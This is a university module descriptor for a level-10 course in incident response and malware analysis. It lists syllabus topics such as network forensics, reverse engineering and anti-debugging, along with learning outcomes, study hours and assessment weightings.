Core Module Information
Module title: Incident Response and Malware Analysis

SCQF level: 10:
SCQF credit value: 20.00
ECTS credit value: 10

Module code: CSN10709
Module leader: Thomas Tan
School School of Computing, Engineering and the Built Environment
Subject area group: Cyber Security and Systems Engineering

Module Code SET08701
Module Title C++ Programming
Examples of Equivalent Learning High level programming language

Description of module content:

The aim of the module is to develop a deep understanding of advanced areas related to security and live/network forensics, with a strong focus on virtualised environments that will allow graduates to act professionally within incident response and in malware/threat analysis. An outline of the main areas includes:
• Threat Timelining. This involves networks and host traces around key threats, such as DDoS, malware infection and data loss.
• Host Investigation Evidence Gathering: Windows, Linux, Android and Mac OS.
• System Architectures, Services and Devices. Networked infrastructures (Servers/Firewall/IDS/ Syslog).
• Network Protocol Analysis. Advanced Network Protocol Analysis, Advanced Trace Analysis, IDS Signature Detection, and Security Threat Network Traces.
• Log Capture/Analysis, and Time-lining. Creating large-scale data infrastructure and analysis methods such as Big Data, SIEM and cross-log analysis .
• Malware Forensics. Code Analysis, Host/Network Analysis, Reverse Engineering. Mobile/x86 architecture, Machine Code Analysis, Vulnerability Analysis and Sandboxed Analysis.
• Malware Analysis. Encoding methods. Static/Dynamic Analysis. Disassembly. Obfuscation. Behaviour Analysis. Encoding methods.
• Advanced Malware Analysis. Anti-disassembly, anti-debugging, packers and unpackers, malware launching, malware signatures, and shell code analysis.
• Data Hiding Data hiding methods, tunnelling, and disk encryption.
• Current Related Research.

Learning Outcomes for module:

LO1: Develop an advanced knowledge of key security/digital forensic principles and methods related to incident response and malware analysis.
LO2: Develop analytical skills related to the key academic principles and practical skills required to understand complex investigations using data from a range of sources, and make informed choices.
LO3: Research, design, implement, evaluate and critically analyse an advanced system to a given set of security and/or digital forensic requirements, with a focus on virtualised environments.

Full Details of Teaching and Assessment
2023/4, Trimester 2, Face-to-Face,
Occurrence: 001
Primary mode of delivery: Face-to-Face
Location of delivery: UK PARTNER
Member of staff responsible for delivering module: Thomas Tan
Module Organiser:

Student Activity (Notional Equivalent Study Hours (NESH))
Mode of activityLearning & Teaching ActivityNESH (Study Hours)
Face To Face Tutorial 18
Independent Learning Guided independent study 182
Total Study Hours200
Expected Total Study Hours for Module200

Type of Assessment Weighting % LOs covered Week due Length in Hours/Words
Centrally Time Tabled Examination 25 1,2 2 HOURS= 1, WORDS= 0
Centrally Time Tabled Examination 25 1,2 4 HOURS= 1, WORDS= 0
Report 50 3 4 HOURS= 16, WORDS= 0
Component 1 subtotal: 100
Component 2 subtotal: 0
Module subtotal: 100

Indicative References and Reading List - URL:
Contact your module leader